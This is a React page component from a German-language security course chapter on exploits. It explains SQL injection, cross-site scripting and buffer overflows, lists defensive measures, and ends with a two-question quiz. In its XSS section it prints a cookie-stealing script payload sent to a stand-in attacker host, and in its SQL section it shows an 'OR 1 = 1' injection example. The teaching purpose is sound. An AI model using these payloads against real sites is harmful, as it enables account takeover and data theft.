import React, { useState, useEffect } from "react";
import { Link, useLocation, useNavigate } from "react-router-dom";
import "bootstrap/dist/css/bootstrap.min.css";
import { Tooltip as ReactTooltip } from "react-tooltip";
import "./assets/style.css";
import { auth, db } from "./firebase";
import { Element, scroller } from "react-scroll";
import firebase from "firebase/compat/app";

const Chapter3_3 = () => {
  const navigate = useNavigate();
  const [selectedAnswers, setSelectedAnswers] = useState({ q1: "", q2: "" });
  const [error, setError] = useState("");
  const [userId, setUserId] = useState(null);

  const questions = [
    {
      question: "Frage 1: Was beschreibt ein „Exploit“ im Zusammenhang mit Sicherheitslücken?",
      options: [
        {
          value: "A",
          label:
            "Ein gezieltes Ausnutzen einer Schwachstelle, um unbefugten Zugriff auf ein System zu erhalten.",
        },
        {
          value: "B",
          label:
            "Ein automatisches Sicherheitsupdate, das eine bekannte Schwachstelle schließt.",
        },
      ],
      correct: "A",
    },
    {
      question: "Frage 2: Wie kann ein Buffer Overflow verhindert werden?",
      options: [
        {
          value: "A",
          label:
            "Durch Schutzmechanismen wie Stack Canaries und Data Execution Prevention (DEP)",
        },
        {
          value: "B",
          label: "Durch die Verwendung größerer Speichermedien.",
        },
      ],
      correct: "A",
    },
  ];
  const location = useLocation();

  useEffect(() => {
  if (location.hash) {
    scroller.scrollTo(location.hash.substring(1), {
      duration: 500,
      smooth: true,
      offset: -50,
    });
  }
}, [location.hash]);

  
  useEffect(() => {
    const unsubscribe = auth.onAuthStateChanged((user) => {
      if (user) {
        setUserId(user.uid); 
      } else {
        console.error("Kein authentifizierter Benutzer gefunden");
        setError("Benutzer ist nicht authentifiziert");
        navigate("/login"); 
      }
    });

   
    return () => unsubscribe();
  }, [navigate]);

  
  useEffect(() => {
    console.log("Aktuelle userId in 3_3.js:", userId);
  }, [userId]);

  const handleLogout = () => {
    
    auth
      .signOut()
      .then(() => {
        
        window.location.href = "/login"; 
      })
      .catch((error) => {
        console.error("Logout fehlgeschlagen:", error);
      });
  };

  const handleAnswerChange = (questionIndex, value) => {
    setSelectedAnswers((prev) => ({
      ...prev,
      [questionIndex]: value,
    }));
  };

  const handleSubmit = async (e) => {
    e.preventDefault();
    const correctAnswers = questions.every(
      (q, index) => selectedAnswers[index] === q.correct
    );

    if (correctAnswers) {
      try {
        if (!userId) {
          console.error("userId ist nicht definiert");
          setError("Ein Fehler ist aufgetreten.");
          return;
        }

        
        const userDoc = await db.collection("users").doc(userId).get();

        console.log("userDoc:", userDoc.exists); 

        if (userDoc.exists) {
          
          await db
            .collection("users")
            .doc(userId)
            .update({
              lastChapter: "3_3",
              completedChapters:
                firebase.firestore.FieldValue.arrayUnion("3_3"),
            });
          console.log("Dokument aktualisiert mit Kapitel 3_3.");
        } else {
          
          await db
            .collection("users")
            .doc(userId)
            .set({
              lastChapter: "3_3",
              completedChapters: ["3_3"],
            });
          console.log("Dokument erstellt mit Kapitel 3_3.");
        }
window.scrollTo({ top: 0, left: 0, behavior: "auto" });
navigate("/3_4");
      } catch (error) {
        console.error("Fehler beim Aktualisieren des Fortschritts:", error);
        setError("Ein Fehler ist aufgetreten. Versuche es später erneut.");
      }
    } else {
      setError("Die Antworten sind nicht korrekt. Versuche es erneut.");
    }
  };
  return (
    <div className="container">
      <div className="container py-5">
        <img
          src="/images/zebbs_Logo.svg"
          class="d-block mx-auto mb-4"
          alt=""
          style={{ width: "20%" }}
        />
        <div className="d-flex justify-content-between align-items-center mb-5 p-3 bg-body-tertiary rounded-3">
          {/* Breadcrumbs */}
          <nav aria-label="breadcrumb">
            <ol className="breadcrumb breadcrumb-chevron mb-0">
              {/* Startseite (Home) */}
              <li className="breadcrumb-item">
                <Link className="link-body-emphasis" to="/course-overview">
                  <i className="bi bi-house-door-fill"></i>
                  <span className="visually-hidden">Home</span>
                </Link>
              </li>

              {/* Library Link */}
              <li className="breadcrumb-item">
                <Link
                  className="link-body-emphasis fw-semibold text-decoration-none"
                  to="/course-overview"
                >
                  3. Angriffe und Risiken
                </Link>
              </li>

              {/* Aktuelle Seite */}
              <li className="breadcrumb-item active" aria-current="page">
                Exploits von Sicherheitslücken
              </li>
            </ol>
          </nav>

          {/* Logout-Button */}
          <button className="btn btn-outline-dark" onClick={handleLogout}>
            Logout
          </button>
        </div>

        <div
          className="p-5 m-0 rounded-3"
          style={{
            position: "relative",
            backgroundColor: "#009fe0",
            margin: "25px",
            textAlign: "center",
          }}
        >
          <h3 className="text-center p-3">Kapitel 3: Angriffe und Risiken</h3>
          <h2 className="text-center p-3">Exploits von Sicherheitslücken</h2>
          <img
            src="./images/exploits.webp"
            alt="SQL-Injection"
            style={{ position: "relative", maxWidth: "25%", height: "auto" }}
          />
        </div>

        <div className="p-5 text-center">
          <h2 className="p-4">Was sind Exploits von Sicherheitslücken?</h2>
          <p className="col-lg-11 mx-auto">
            Sobald eine Sicherheitslücke in einer Software entdeckt wird,
            versuchen Angreifer diese Schwachstelle auszunutzen. Sie entwickeln
            Exploits, um in das System einzudringen, unautorisierten Zugriff zu
            erlangen, Daten zu stehlen oder Systeme zu sabotieren. Ein Exploit
            ist ein Code, ein Skript oder ein Werkzeug, das diese
            Sicherheitslücke gezielt anspricht und ausnutzt.
            <br />
            <br />
            Man unterscheidet je nach Angriff unterschiedliche Techniken, die
            bei der Entwicklung oder Durchführung eines Exploits verwendet
            werden, um eine Schwachstelle auszunutzen.
          </p>
        </div>
      </div>

      <div className="grey-section">
        <div className="container pb-5">
          <div className="p-5 text-center">
            <h3 className="p-5">SQL-Injection</h3>
            <Element name="sql">
              <p className="col-lg-11 mx-auto">
                Websites haben fast immer eine Datenbank für die häufig die
                Programmiersprache SQL (Structured Query Language) verwendet
                wird. Aus der Datenbank werden Daten abgerufen, eingefügt,
                aktualisiert oder gelöscht. Websites beinhalten oft auch
                Formulare für Eingaben (Kontaktformular, Login-Formular oder
                Produktsuche). Diese Eingabemöglichkeiten sind leider eine der
                am häufigsten ausgenutzten Schwachstellen in Webanwendungen.
                <br />
                <br />
                <strong>Wie funktioniert das?</strong>
                <br />
                <br />
                Angenommen, ein Student will seine Note abrufen. Er gibt in ein
                Formular seine Matrikelnummer „12345“ ein. Sie SQL-Abfrage an
                die Datenbank lautet dann:
                <br />
              </p>
              <p className="col-lg-11 mx-auto p-1 code-container">
                <pre>
                  <code>
                    "SELECT * FROM students WHERE matrikelnummer = '12345'";
                  </code>
                </pre>
              </p>
              <p className="col-lg-11 mx-auto p-3">
                <br />
                Der Datensatz, der unter seiner Matrikelnummer in der Datenbank
                "students" vorhanden ist, wird dann angezeigt. Wenn stattdessen
                jedoch „12345 OR 1 = 1“ eingegeben wird, hat man SQL-Injection
                Exploit versucht. <br /> Durch den simplen Anhang "OR 1 = 1"
                verändert sich die SQL-Abfrage an die Datenbank in: <br />
              </p>
              <p className="col-lg-11 mx-auto p-1 code-container">
                <pre>
                  <code>
                    "SELECT * FROM students WHERE matrikelnummer = '12345' OR 1
                    = 1";
                  </code>
                </pre>
              </p>
              <p className="col-lg-11 mx-auto pt-3">
                Durch das Hinzufügen der Bedingung "OR 1 = 1" und da "1 = 1"
                immer wahr ist, führt diese Abfrage dazu, dass die Datenbank
                alle Datensätze in der Tabelle „students“ zurückgibt, anstatt
                nur den Datensatz für die Matrikelnummer „12345“.
                <br />
                <br />
                <strong>Was sind die Folgen?</strong>
                <br />
                <br />
                Wenn ein Angreifer diese Technik in einem schlecht gesicherten
                System verwendet, könnte er auf Daten von allen Studierenden
                zugreifen oder andere schädliche Aktionen ausführen, wie z. B.
                das Löschen von Daten oder das Ändern von Noten. Es würde ein
                schwerwiegendes Datenschutzproblem vorliegen, da sensible
                Informationen anderer Studierender offengelegt werden könnten.{" "}
                <br />
                <br />
                Eine SQL-Injektionen ist demnach einfach durchzuführen, wenn die Anwendung (App, Website, Plattform usw.) nicht sicher programmiert ist.
              </p>{" "}
            </Element>
          </div>

          <p className="col-lg-11 mx-auto d-inline-flex p-5 mb-5 text-decoration-none border-beispiel rounded-2">
            <img
              src="/images/attack.svg"
              alt="Angriff"
              style={{
                position: "relative",
                maxWidth: "10%",
                height: "auto",
              }}
            />
            2008 erfolgte ein Exploit auf das US-Unternehmen Heartland Payment
            Systems, bei dem eine SQL-Injection dazu führte, dass mehr als 130
            Millionen Kreditkartennummern gestohlen wurden. Der finanzielle
            Schaden für das Unternehmen und die damit verbundenen Kosten wurden
            auf hundert Millionen US-Dollar geschätzt, einschließlich
            Bußgeldern, Rechtskosten und Kosten für die Reaktion auf den
            Angriff.
          </p>
        </div>
      </div>

      <div className="p-5 text-center" style={{ backgroundColor: "#ffffff" }}>
        <h3 className="p-5">Cross-Site Scripting (XSS)</h3>
        <Element name="xss">
          <p className="col-lg-11 mx-auto">
            Cross-Site Scripting (XSS) ist ein Exploit, bei dem ein Angreifer
            schädlichen Code in Webseiten einschleust, der dann unwissentlich
            von einem Besucher der Seite ausgeführt wird.
            <br />
            <br />
            Beim <strong>persistenten Cross-Site Scripting</strong> wird in
            einem Kommentarbereich einer Website oder einem Forenbeitrag
            anstelle eines normalen Kommentartextes schädlicher Code,
            eingebettet in Script-Tags, eingegeben. Die Script-Tags "&lt;" am
            Anfang und "&gt;" am Ende signalisieren dem Computer "Das hier ist
            ein Code und kein Text - also behandele ihn auch wie einen Code" -
            und der Computer führt den Code tatsächlich aus. <br />
            <br />
            Beispiel: Ein Angreifer postet in einem Forum folgenden Code in
            einem Kommentar:
            <p className="col-lg-11 mx-auto p-1 code-container">
              <pre>
                <code>
                  {
                    "<script>document.location='http://böse-seite.com/steal.php?cookie='+document.cookie;</script>"
                  }
                </code>
              </pre>
            </p>
            Wenn ein anderer Nutzer die betroffene Seite aufruft, wird der
            Schadcode automatisch in seinem Browser ausgeführt und sendet seine
            Cookies an den Angreifer.
            <p className="col-lg-11 mx-auto"></p>
            Diese Cookies können Anmeldedaten für eine Plattform enthalten, die
            für eine gewisse Zeit auf der Seite gespeichert bleiben, um erneute
            Anmeldungen zu vermeiden. Der Angreifer kann sich mit de Daten des
            Nutzers in dessen Benutzerkonto auf der Plattform anmelden und
            schädliche Aktionen durchführen.
            <br />
            <br /> <br />
            Beim
            <strong> reflektierten Cross-Site Scripting </strong> wird der
            Schadcode an das Ende der{" "}
            <span
              data-tooltip-id="tooltip-url"
              data-tooltip-content="Eine URL (Uniform Resource Locator) ist die eindeutige Adresse, mit der Ressourcen wie Webseiten, Bilder oder Dateien im Internet gefunden und aufgerufen werden können und die du z. B. im Browser eingibst um auf diese Seite zu gelangen."
              className="custom-tooltip-trigger"
            >
              {" "}
              URL{" "}
            </span>{" "}
            einer legitimen und vertrauenswürdigen Website angehängt. Wenn das
            Opfer einen solchen manipulierten Link anklickt und in seinem
            Webbrowser öffnet, wird der injizierte Code ausgeführt. <br />
            <br />
            Häufig ist der Versand einer gefälschten E-Mail, die angeblich von
            einer vertrauenswürdigen Quelle, wie einer Bank, stammt. In der
            E-Mail wird das Opfer aufgefordert, eine Aktion auf der Website der
            Bank durchzuführen und dazu einen bereitgestellten Link zu
            verwenden. Der Link könnte wie folgt aussehen:
            <br />
            <br />
          </p>
        </Element>

        <p className=" browser-url">
          https://meine-bank.com/index.php?user=hier-kommt-der-schaedliche-codeanhang!
        </p>
        <p className="col-lg-11 mx-auto">
          <br />
          Obwohl der erste Teil der URL "https://meine-bank.com/index.php?user="
          sicher erscheint und die Domain einer vertrauenswürdigen Website
          enthält, kann der am Ende der URL eingefügte Code
          "hier-kommt-der-schaedliche-codeanhang!" schädlich sein.
          <br />
          <br />
          <strong>Was sind die Folgen?</strong>
          <br />
          <br />
          XSS kann es Angreifern ermöglichen, Benutzerkonten zu übernehmen,
          persönliche Daten zu stehlen oder schädliche Aktionen im Namen des
          Benutzers auszuführen.
          <br />
          <br />
        </p>
        <ReactTooltip id="tooltip-url" place="top" className="custom-tooltip" />
      </div>

      <div className="grey-section">
        <div className="container pb-5">
          <div className="p-5 text-center">
            <h3 className="p-5">Buffer Overflow</h3>
            <p className="col-lg-11 mx-auto">
              Ein Buffer Overflow Exploit ist ein Angriff auf eine
              Sicherheitslücke, die entsteht, wenn ein Programm versucht, mehr
              Daten in einen Puffer zu schreiben, als dieser aufnehmen kann. Ein
              Puffer ist ein fester Speicherbereich, der zur temporären
              Speicherung von Daten verwendet wird, beispielsweise von
              Benutzereingaben oder Zwischenergebnissen.
              <br />
              <br />
              <strong>Wie funktioniert das?</strong>
              <br />
              <br />
              Wenn mehr Daten in den Puffer geschrieben werden, als er aufnehmen
              kann, werden die überschüssigen Daten in angrenzende
              Speicherbereiche geschrieben. Ein Angreifer kann dies ausnutzen,
              indem er die überschüssigen Daten so gestaltet, dass sie
              schädlichen Code z. B.{" "}
              <span
                data-tooltip-id="tooltip-shell"
                data-tooltip-content="Shellcode bezeichnet einen kleinen Programmcode, der nach dem Ausnutzen einer Sicherheitslücke ausgeführt wird. Er dient oft dazu, eine sogenannte „Shell“ (also eine Kommandozeile) zu öffnen oder weiteren Code nachzuladen. Er wird häufig bei Exploits verwendet, um eine Shell (Befehlszeile) auf einem Zielsystem zu öffnen und dem Angreifer Kontrolle über das System zu geben."
                className="custom-tooltip-trigger"
              >
                {" "}
                Shellcode{" "}
              </span>{" "}
              enthalten oder kritische Informationen überschreiben. Dieser
              schädliche Code könnte dann bei der nächsten Ausführung des
              Programms ausgeführt werden oder die Kontrolle über das Programm
              auf eine bösartige Weise verändern.
              <br />
              <br />
              Angenommen, ein Programm hat ein Eingabefeld für einen Namen und
              einen Puffer, der 15 Zeichen speichern kann. Wenn du "Max
              Mustermann" eingibst, passen die 13 Zeichen problemlos in den
              Puffer. Wird jedoch absichtlich ein längerer Namen eingegeben, der
              den Puffer überfüllt, werden die zusätzlichen Zeichen in
              angrenzende Speicherbereiche geschrieben. Dies könnte dazu führen,
              dass das Programm unerwartete und schädliche Aktionen ausführt.
              <br />
              <br />
              <strong>Was sind die Folgen?</strong>
              <br />
              <br /> Buffer Overflow Exploits können es Angreifern ermöglichen,
              die Kontrolle über ein System zu übernehmen, schädlichen Code
              auszuführen oder das System zum Absturz zu bringen.
            </p>
            <ReactTooltip
              id="tooltip-shell"
              place="top"
              className="custom-tooltip"
            />
          </div>
        </div>

        <div className="container">
          <div
            className="safe rounded-2 text-center"
            style={{ backgroundColor: "#fec748" }}
          >
            <img
              src="/images/abwehr.svg"
              alt="Abwehr"
              style={{
                position: "relative",
                maxWidth: "7%",
                height: "auto",
              }}
            />
            <h3 className="p-5">
              Maßnahmen gegen Exploits von Sicherheitslücken
            </h3>
            <p className="col-lg-11 mx-auto">
              Da diese Exploits vor allem ungeschützte Eingabemöglichkeiten
              ausnutzen, müssen die Entwickler frühzeitig sicherstellen, dass
              Benutzereingaben ordnungsgemäß validiert und bereinigt werden.
              Dies kann durch einige Methoden einfach erreicht werden: <br />{" "}
              <br /> Bei der
              <strong> Sanitization </strong>(Bereinigung) wird der schädliche
              Teil der Eingabe entfernt oder entschärft, sodass der Eingabewert
              keine Gefahr mehr darstellt und die Datenbankabfragen sicher
              bleiben. Zum Beispiel werden typische schädliche SQL-Befehle wie
              "DROP TABLE" oder unser "OR 1 = 1" erkannt und direkt entfernt.
              <br />
              <br />
              Html-Tags wie "&lt;" und "&gt;" oder das in SQL-Abfragen oft
              verwendete " ' "-Apostroph werden beim <strong>
                Escaping
              </strong>{" "}
              (Voransetzen eines Backslash "\" ) unschädlich gemacht.
              <br />
              <br />
              Eine weitere Schutzmaßnahme ist die
              <strong> Einschränkung der Eingabetypen</strong> um
              sicherzustellen, dass nur erwartete Eingaben zugelassen und
              abweichende Eingaben als verdächtig erkannt und blockiert werden.
              So könnte beispielsweise ein Eingabefeld für eine E-Mail-Adresse
              so konfiguriert werden, dass nur gültige E-Mail-Formate akzeptiert
              werden. <br />
              <br />
              Zusätzlich kann durch
              <strong> Validierung</strong> direkt bei der Eingabe
              sichergestellt werden, dass die Daten den erwarteten Formaten
              entsprechen (z. B. dass eine Telefonnummer nur Zahlen enthält).
              <br />
              <br />
              Es sollten zudem
              <strong> Prepared Statements</strong> verwenden werden, um
              SQL-Abfragen sicherer zu gestalten. Dafür verwendet der Entwickler
              Platzhalter (z. B. "?" oder ":param") in den SQL-Abfragen, die die
              tatsächlichen Eingaben separat behandeln und verarbeiten. Dadurch
              werden Benutzereingaben immer als Daten erkannt und nicht als
              ausführbarer SQL-Code.
              <br />
              <br />
              Um Buffer Overflows zu verhindern, sollten Entwickler
              sicherstellen, dass die Größe von Puffern stets überprüft wird,
              bevor Daten hineingeschrieben werden. Wichtige Schutzmechanismen
              sind{" "}
              <span
                data-tooltip-id="tooltip-stack"
                data-tooltip-content="Stack-Canaries sind kleine Schutzmechanismen, die verhindern sollen, dass Angreifer durch einen Buffer Overflow wichtige Daten auf dem Stack überschreiben. Sie funktionieren wie ein Wachhund: Vor sensiblen Bereichen wird ein spezielles, schwer vorhersagbares Wert (Canary) gespeichert. Bevor eine Funktion endet, wird überprüft, ob dieser Wert noch unverändert ist. Ist er verändert, weiß das Programm, dass etwas schiefgelaufen ist, und kann Schutzmaßnahmen ergreifen.
              "
                className="custom-tooltip-trigger"
              >
                Stack Canaries
              </span>{" "}
              , die Veränderungen im Speicher erkennen und Angriffe stoppen
              können, sowie{" "}
              <span
                data-tooltip-id="tooltip-dep"
                data-tooltip-content="Data Execution Prevention (DEP) ist eine Sicherheitsmaßnahme, die verhindert, dass Datenbereiche im Speicher (wie der Stack oder der Heap), die normalerweise nur zum Speichern von Daten gedacht sind, als ausführbarer Code verwendet werden. Das schützt vor Angriffen, bei denen schädlicher Code in solche Bereiche eingeschleust und ausgeführt werden soll.
              "
                className="custom-tooltip-trigger"
              >
                Data Execution Prevention (DEP),
              </span>{" "}
              die verhindert, dass bestimmte Speicherbereiche als ausführbarer
              Code genutzt werden.
              <br />
              <br />
              Es sollten regelmäßig{" "}
              <strong>
                {" "}
                <Link to="/2_1#pentest" className="icon-link">
                  <svg className="bi" aria-hidden="true">
                    <use xlinkHref="#book"></use>
                  </svg>{" "}
                  Penetrationstests
                </Link>
              </strong>{" "}
              durchgeführt werden, um Schwachstellen im System zu identifizieren
              und zu beheben, bevor sie von Angreifern ausgenutzt werden können.
              Diese Pen-Tests simulieren reale Angriffe und zeigen potenzielle
              Exploits auf.
            </p>

            <ReactTooltip
              id="tooltip-dep"
              place="top"
              className="custom-tooltip"
            />
            <ReactTooltip
              id="tooltip-stack"
              place="top"
              className="custom-tooltip"
            />
          </div>
        </div>
      </div>
      {/* Fragenteil */}
      <div className="container pt-5 my-5">
        <div className="text-center m-4">
          <h2>Überprüfe dein Wissen</h2>
          <p className="col-lg-11 mx-auto">
            Mit den richtigen Antworten kommst du weiter!
          </p>
        </div>
        <div className="row justify-content-center">
          <div className="col-md-10 text-start">
            <form onSubmit={handleSubmit}>
              {questions.map((question, index) => (
                <div key={index} className="mb-4">
                  <p className="fs-4">{question.question}</p>{" "}
                  {question.options.map((option) => (
                    <div key={option.value} className="form-check">
                      <input
                        className="form-check-input me-2"
                        type="radio"
                        name={`question${index}`}
                        value={option.value}
                        checked={selectedAnswers[index] === option.value}
                        onChange={() => handleAnswerChange(index, option.value)}
                      />
                      <label className="form-check-label fs-5">
                        {option.label}
                      </label>{" "}
                    </div>
                  ))}
                </div>
              ))}
              {error && <p className="text-danger">{error}</p>}
              <div className="text-center">
                <button type="submit" className="btn btn-primary">
                  überprüfen
                </button>
              </div>
            </form>
          </div>
        </div>
      </div>
      {/* Ende Fragenteil */}
    </div>
  );
};

export default Chapter3_3;
